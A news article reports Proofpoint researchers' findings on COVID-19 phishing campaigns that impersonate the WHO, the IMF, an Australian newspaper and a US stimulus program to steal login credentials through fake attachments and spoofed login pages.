Researchers at cybersecurity firm Proofpoint have published details of some of the most prevalent phishing attacks related to the COVID-19 coronavirus – and attackers are using false cash stimulus ‘promises' as bait.
Genuine cash stimulus packages from governments and banks are common while COVID-19 damages people and economies – and cybercriminals have seen the potential, as they have impersonated these institutions – and even the World Health Organization (WHO) itself.
In one case, a phishing campaign targeted at tech and IT firms worldwide claims to come from the WHO and the International Monetary Fund (IMF). It says the recipient has been ‘randomly selected' for financial compensation due to COVID-19. To claim their funds, they must view and print the attached document.
The email contains a malicious Excel-branded attachment, called COVID-1918-COMPENSATION.html, that asks for a username and password when opened. Attackers have then collected those usernames and passwords.
In another case, attackers have impersonated a major Australian newspaper to trick recipients into clicking an attachment with an embedded URL that then spoofs a OneDrive login page.
According to Proofpoint researchers, the email claims that the “Government has released its stimulus package in response to the Coronavirus outbreak” and encourages the recipient to open the malicious attachment for more details.
When users click the link, a spoofed OneDrive login page collects user information.
Proofpoint researchers comment that the emails are actually delivered by “Romanian top-level domain address of “.ro.” To appear authentic, the message includes supposed contact information for the paper and notes that they are “…happy to advise that we have now moved back to” the address provided. It's notable that the address in the email does not match the newspaper being spoofed.
In a third case, attackers targeted US healthcare and higher education institutions in a campaign claiming that the Trump administration may send US adults a check for $1000 to stimulate the economy.
That, however, is false – as people who click the link are taken to a phishing page that asks for domain/username, email address, and password.
“The messages are notable for its crude design, as the message has clear grammar and usage errors and uses a basic webpage clearly branded by a free website maker for its credential phishing,” say Proofpoint researchers.
The researchers say that the wider implications of these phishing attempts show that attackers are using ‘social engineering at scale'. Researchers believe the attackers will continue to change their attack strategies to keep up with news about COVID-19.